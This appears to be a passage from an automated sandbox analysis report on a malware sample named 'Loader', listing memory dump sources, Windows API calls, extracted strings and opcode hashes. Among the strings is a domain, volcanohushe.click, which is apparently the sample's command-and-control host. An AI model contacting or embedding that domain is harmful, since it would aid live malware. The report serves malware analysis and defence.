                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00ED0198,00000002,00000000,?,?,?,00ED0198,?,00000000), ref: 00ED0860
                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00ED0198,00000002,00000000,?,?,?,00ED0198,?,00000000), ref: 00ED0889
                                                                                        • GetACP.KERNEL32(?,?,00ED0198,?,00000000), ref: 00ED089E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID: ACP$OCP
                                                                                        • API String ID: 2299586839-711371036
                                                                                        • Opcode ID: 0594797cdd572dfd6361d1fa1c89c1a3f7925d437b8a4b8cadec458b36fdf47e
                                                                                        • Instruction ID: b1ec24fbffcb299ffdf07978b1a6e6e05714fb3850e8383180ebe8bf3a48851d
                                                                                        • Opcode Fuzzy Hash: 0594797cdd572dfd6361d1fa1c89c1a3f7925d437b8a4b8cadec458b36fdf47e
                                                                                        • Instruction Fuzzy Hash: CB21F92AA001449ADB388B55C94179773A6EF90B68F5E9026E80AF7310E731DD42E3D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: +$JSQC$J_\e$iWDB$klSm$wJsU
                                                                                        • API String ID: 0-48882314
                                                                                        • Opcode ID: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
                                                                                        • Instruction ID: 6539de25e02be62e166c2d6d1fbf72afe4b3ae9106669352150e090de26398d0
                                                                                        • Opcode Fuzzy Hash: 6b08c17d73f50599bc3423449fc688f48cd1f5fde1254425c14f9c76bad262bb
                                                                                        • Instruction Fuzzy Hash: 1B72597090C3518FC725CF29C8406AFBBE1AF95314F188A6EE8E58B392D738D946C756
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: >j%h$C@$IG$YF$w
                                                                                        • API String ID: 0-3977256543
                                                                                        • Opcode ID: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
                                                                                        • Instruction ID: bddec1b54a39677e85b17c04ceb6ad18fd944dcb43d24b0713774ccf1a2472f2
                                                                                        • Opcode Fuzzy Hash: b1c41823cc40404da43d45bdcbf5a05d767afae4a0658e6817707d5df229ca96
                                                                                        • Instruction Fuzzy Hash: A302107260C3408BD704DF69C8516ABFBE2EFD6314F09882DE4D58B392E7389545CB9A
                                                                                        APIs
                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED0E99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: a101d9e28bf9309cddbdeecfe26bf0a4b252fe11af48f1311c9dbd0014bd6e72
                                                                                        • Instruction ID: 22a29920c7d53a93da275ec8971d224237e2b005441335659cc7492cde7e7ec4
                                                                                        • Opcode Fuzzy Hash: a101d9e28bf9309cddbdeecfe26bf0a4b252fe11af48f1311c9dbd0014bd6e72
                                                                                        • Instruction Fuzzy Hash: 0C71D27194515C6FDF30AF24CC89BAEBBB9EB05308F1851DAE409B7351EA315E868F10
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00EBE438
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00EBE504
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EBE51D
                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00EBE527
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 254469556-0
                                                                                        • Opcode ID: c7c5dcb862a7604ac853d15e64c1ba68deff79a79bc0f9f2e651e07b1cbf7bf0
                                                                                        • Instruction ID: bf2f94e5c44a02140c404377765d91ba14535ab9a097f871884b37a7e6de7f12
                                                                                        • Opcode Fuzzy Hash: c7c5dcb862a7604ac853d15e64c1ba68deff79a79bc0f9f2e651e07b1cbf7bf0
                                                                                        • Instruction Fuzzy Hash: 3731D8B5D0121C9BDB21DFA5D9897CDBBF8AF08304F1041EAE40DAB250EB759A85CF45
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: 3wA$Oslm$L4$L4
                                                                                        • API String ID: 2994545307-2234767502
                                                                                        • Opcode ID: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
                                                                                        • Instruction ID: 307d0b6bb99e80c2126adcaddeb59da55b998df86b0f55e95dd8da5ebd5bfe2f
                                                                                        • Opcode Fuzzy Hash: 82bf725f0757daa157f32e025d8a74b38d6c37187c90028344b6b4186a80b1bb
                                                                                        • Instruction Fuzzy Hash: BFD147716083419FD724CF28C8817ABB7E2ABC6314F188A3DE4D983392D735D856CB86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 7$WT$gfff
                                                                                        • API String ID: 0-3918836065
                                                                                        • Opcode ID: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
                                                                                        • Instruction ID: b46a7ac6f51d3cab31650695944aba32df2089761ef6db5e6300506385caa733
                                                                                        • Opcode Fuzzy Hash: c1e1d21124b2e52469f7f82df4301e15a45ac8879c3b69de27b99dc034c8f0a4
                                                                                        • Instruction Fuzzy Hash: D8A13A73A106008FD318CA29CC517FBB7D3ABC5324F1AC63ED456CB2D9EA3898468785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Ju$tu$w~
                                                                                        • API String ID: 0-2718015323
                                                                                        • Opcode ID: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
                                                                                        • Instruction ID: 3c52c23171b1d345c2d49e998851337e4974a2c3d886fd1ac3d2f2ae50b48a00
                                                                                        • Opcode Fuzzy Hash: a8a042c75a796f11769dd960a33e4198fe42849cae9fa5f40045990e2e3e9ece
                                                                                        • Instruction Fuzzy Hash: 6F41AA700093918BC724CF29C8606BBBBE0EF83364F04495DE5D28B291E3BD9945CB97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: KJIH$xlc=$xlc=
                                                                                        • API String ID: 0-3693430147
                                                                                        • Opcode ID: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
                                                                                        • Instruction ID: 1df2b0cd354e5eb9382eacdd7d6201147e9d1f654fc09427a9397325319c904e
                                                                                        • Opcode Fuzzy Hash: ddcbebc37588f3223e6456a98ecf1037c94c59a38205b2405806e0036c004e6d
                                                                                        • Instruction Fuzzy Hash: 4441F53AB69724DBC7289F59ECC152AF7E1EB99710F84543ED982DB311C728DC01878A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @gB$kim}
                                                                                        • API String ID: 0-565826954
                                                                                        • Opcode ID: b9771cc6a1c9dc5aa759e40e45813aeb6d2542078393295f4b3fb4169dc1c76f
                                                                                        • Instruction ID: 9883a33267a4edeb7d73dc9f2210c431252dad24f6d1f8ca6899b908e8f0c5d9
                                                                                        • Opcode Fuzzy Hash: b9771cc6a1c9dc5aa759e40e45813aeb6d2542078393295f4b3fb4169dc1c76f
                                                                                        • Instruction Fuzzy Hash: 1E225875E04265CFCB14CF68D8916AEBBB1EF49304F1980AED851AB352C739AD06CBD4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: p{-s$p{-s
                                                                                        • API String ID: 2994545307-716220686
                                                                                        • Opcode ID: 2aef8b8498d302ea470229f2b31964dafa280691521ba20ab2529de80153c117
                                                                                        • Instruction ID: f0c58c42614237375e365d72bc3c7a37cc96942c1005d0a9fe5c86925e2313ea
                                                                                        • Opcode Fuzzy Hash: 2aef8b8498d302ea470229f2b31964dafa280691521ba20ab2529de80153c117
                                                                                        • Instruction Fuzzy Hash: 48810435240601AFC728CB29CD92672B7E2EB8530871C8D7FD156D76A6D73DE8229B08
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D]+\
                                                                                        • API String ID: 0-1174097187
                                                                                        • Opcode ID: 0d41e0e1d96c0d5275cbc1ccfd3832cd9580ac32bd5875f1c036d976f95b2d15
                                                                                        • Instruction ID: 9251f9772932f48160a5ade6cb9760e2072f5487641182bc89e2b62d99dc5cf9
                                                                                        • Opcode Fuzzy Hash: 0d41e0e1d96c0d5275cbc1ccfd3832cd9580ac32bd5875f1c036d976f95b2d15
                                                                                        • Instruction Fuzzy Hash: C45224B9A18200ABD714DF14D84167BB7E1FBD6314F19892EE88197391D73CEC41CB9A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: z
                                                                                        • API String ID: 2994545307-1657960367
                                                                                        • Opcode ID: c7a99f6c6c6413b9328a1f415840cf05a1af755a24bae09dd66a052c86edf477
                                                                                        • Instruction ID: a41510cab639ff2c168ed1a461397d8e6c98ec91fc98b876038bb987118f98da
                                                                                        • Opcode Fuzzy Hash: c7a99f6c6c6413b9328a1f415840cf05a1af755a24bae09dd66a052c86edf477
                                                                                        • Instruction Fuzzy Hash: 7FD12934A083409FD724CF2598907BBB7E2EBDA314F19592EE0D657291C738D847CB5A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: 056w
                                                                                        • API String ID: 2994545307-3031594284
                                                                                        • Opcode ID: d41cf2aced06695c6dce53ea779f2bf54988cbc4b145618bc2f0dedb8f096e31
                                                                                        • Instruction ID: 1e524d56f986b60e63968127200a34d937c12baad4a8d406414dac60ed768612
                                                                                        • Opcode Fuzzy Hash: d41cf2aced06695c6dce53ea779f2bf54988cbc4b145618bc2f0dedb8f096e31
                                                                                        • Instruction Fuzzy Hash: C0C17A72A083005BD3249E24CCC277BB7A2EBCA314F18A52ED59557391D6BCDC46C79A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \l
                                                                                        • API String ID: 0-332606932
                                                                                        • Opcode ID: 2dec8be2b520b2186125d96ced5c0adb923a6fa7d4cda33570fed64b2fe6fc8e
                                                                                        • Instruction ID: 852c598ae3c60e65e129f9c36e5a4a5eb34ebc179e5d94f45104046a45fe5565
                                                                                        • Opcode Fuzzy Hash: 2dec8be2b520b2186125d96ced5c0adb923a6fa7d4cda33570fed64b2fe6fc8e
                                                                                        • Instruction Fuzzy Hash: E7B18D72A143209BD7249F24AC82677B3B1EFA1314F99852EECC557351E23CEC05C79A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _
                                                                                        • API String ID: 0-701932520
                                                                                        • Opcode ID: c3dfae79088f6faf2fd2d7b366d4b356a6ca7e7aafd60081d9beaeb1768c1e58
                                                                                        • Instruction ID: 2874f46035bf117a80d7d2a23349d9cb71d49021efdfc033c4a59cdebb79e407
                                                                                        • Opcode Fuzzy Hash: c3dfae79088f6faf2fd2d7b366d4b356a6ca7e7aafd60081d9beaeb1768c1e58
                                                                                        • Instruction Fuzzy Hash: 86B1F77560C3408BD7258F2898617FBBBF2ABDA314F28497ED4C687382D7389851875A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: /4-"
                                                                                        • API String ID: 2994545307-255669811
                                                                                        • Opcode ID: f4558d96d5aa098eeacb25ccd83ed2fcdbbf09adccc6b57ad2e83dd542a83ca3
                                                                                        • Instruction ID: 5d47b2a4792fb15c73dd9788517ba42da93c73d11f813630f87d1316b5251ac7
                                                                                        • Opcode Fuzzy Hash: f4558d96d5aa098eeacb25ccd83ed2fcdbbf09adccc6b57ad2e83dd542a83ca3
                                                                                        • Instruction Fuzzy Hash: B8913835604311AFE720DF28C88066BB7E2EFD4750F19852DEA815B395DB39EC62C785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: c`^Z
                                                                                        • API String ID: 0-4018570465
                                                                                        • Opcode ID: 9eaaeac1af0046f77bfdce008b90eb0f0d12110f4699f489367c40e366593788
                                                                                        • Instruction ID: 84572387e2f9d8e30e4a59fcb4903cfd6437d21f2140ce11b4878cf53556221a
                                                                                        • Opcode Fuzzy Hash: 9eaaeac1af0046f77bfdce008b90eb0f0d12110f4699f489367c40e366593788
                                                                                        • Instruction Fuzzy Hash: DA513576A0C3A18BC335CF3998903E7BBE2AF96704F58896EC4C99B205DA3845058786
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: c`^Z
                                                                                        • API String ID: 0-4018570465
                                                                                        • Opcode ID: d783b575065614c62e39edefdac40061046f0ec8c49e4bcc71ff719ed9c249e9
                                                                                        • Instruction ID: 62403507b67e3add205e3cb6eb23e8c84b81608dc76150191bd4437fa6a5d6a1
                                                                                        • Opcode Fuzzy Hash: d783b575065614c62e39edefdac40061046f0ec8c49e4bcc71ff719ed9c249e9
                                                                                        • Instruction Fuzzy Hash: 8241477061C3D18BD735CF3994903E7BBE1EB97700F68896DC0C987246DB3844068B96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: KI
                                                                                        • API String ID: 0-1977173829
                                                                                        • Opcode ID: 9817d8d2cd989187cfd65775c6c2d6774b5ae1b7bccca7278f7fa6d8ef7e6c81
                                                                                        • Instruction ID: 91a34f79fce4890eca5ccf24ac22c1236428951ee7d79aa7463c0d4d2c87feab
                                                                                        • Opcode Fuzzy Hash: 9817d8d2cd989187cfd65775c6c2d6774b5ae1b7bccca7278f7fa6d8ef7e6c81
                                                                                        • Instruction Fuzzy Hash: 9C41F43564C7908AD3358F34D8943EABBF1ABD6300F58866DD4C99B382CB7855069B86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: q
                                                                                        • API String ID: 0-4110462503
                                                                                        • Opcode ID: fc3bb61bfd94ae5a3fae19a49a936b96d29985acd56f8c40518c59ddd57b5efb
                                                                                        • Instruction ID: 93a25755fb4b0333ef7b556c8c5401fcb28c9ec14eb27c0752a44160350e560f
                                                                                        • Opcode Fuzzy Hash: fc3bb61bfd94ae5a3fae19a49a936b96d29985acd56f8c40518c59ddd57b5efb
                                                                                        • Instruction Fuzzy Hash: AA41583464C340ABC7054B24DC06B6E7BA1AF97B05F04896EF5E18B2E1C7798815CB8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: KI
                                                                                        • API String ID: 0-1977173829
                                                                                        • Opcode ID: 1cb5d465071201c5d4a5cc368f7d339e4b5fbc63d8b3d73cbb9a409c79d20b7b
                                                                                        • Instruction ID: aae285d08021c98cc9ad7b5e59d58feaf1cef8b380b4a0bc2b22dfea0a95e3f8
                                                                                        • Opcode Fuzzy Hash: 1cb5d465071201c5d4a5cc368f7d339e4b5fbc63d8b3d73cbb9a409c79d20b7b
                                                                                        • Instruction Fuzzy Hash: CF411675A4C7908BD3258F34D8943EABBF1FBC5300F588A6DD4C99B385CB7854069B86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: volcanohushe.click
                                                                                        • API String ID: 0-3487758016
                                                                                        • Opcode ID: b2e33bdc19f01c0d864218a4dc0cc21f643ae0fc09979f94a9809007749323a0
                                                                                        • Instruction ID: b8e46fd4180620e8fa4f02fa5b31e0b327415897175f02e2bb6ac1baa248a022
                                                                                        • Opcode Fuzzy Hash: b2e33bdc19f01c0d864218a4dc0cc21f643ae0fc09979f94a9809007749323a0
                                                                                        • Instruction Fuzzy Hash: 011125346555019AE34DCB34C8E6B7AA363EF43304B64622DD113A32E5DB796816C61C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: v
                                                                                        • API String ID: 0-1801730948
                                                                                        • Opcode ID: d255b25c69fcc9c8248d0df40f5e3549dd583127a3b06a41a83426b700faeda1
                                                                                        • Instruction ID: 9699c58770c97fb3a7005195816939a3fdc948d4c1fc9f16f5ad9316cf85a81d
                                                                                        • Opcode Fuzzy Hash: d255b25c69fcc9c8248d0df40f5e3549dd583127a3b06a41a83426b700faeda1
                                                                                        • Instruction Fuzzy Hash: EB11E276D187618BC310CF34C98028FBAE2ABC9315F16892DE4C5A3315D678CD48CB8B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: lhin
                                                                                        • API String ID: 0-138776974
                                                                                        • Opcode ID: 8b26fef1caf86ef8e11393a310a0b5113c05f2ec9044265c383a10711fd843b9
                                                                                        • Instruction ID: 7fd97130cce7ea1aa8fbfb12d6e93ce7f630f2e99416a8fc191b46fa008a84d9
                                                                                        • Opcode Fuzzy Hash: 8b26fef1caf86ef8e11393a310a0b5113c05f2ec9044265c383a10711fd843b9
                                                                                        • Instruction Fuzzy Hash: D0F0E236F742848BD708CFB9CC4226A66E3DB1A204B18D43DC456E3741E128E8014F18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: volcanohushe.click
                                                                                        • API String ID: 0-3487758016
                                                                                        • Opcode ID: c11dde4bea6cdc3f43d55281e8cc4d938954cac3924490b2dcf7e503bc37ced3
                                                                                        • Instruction ID: b0d56012c3d891d04b8b069242e406f0bf4132553d77d7a172f771eb767dd099
                                                                                        • Opcode Fuzzy Hash: c11dde4bea6cdc3f43d55281e8cc4d938954cac3924490b2dcf7e503bc37ced3
                                                                                        • Instruction Fuzzy Hash: 1CF0A739A502158BCB04CF14C86277773B2EF8A312F046425D547EB392D3788C40C7A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
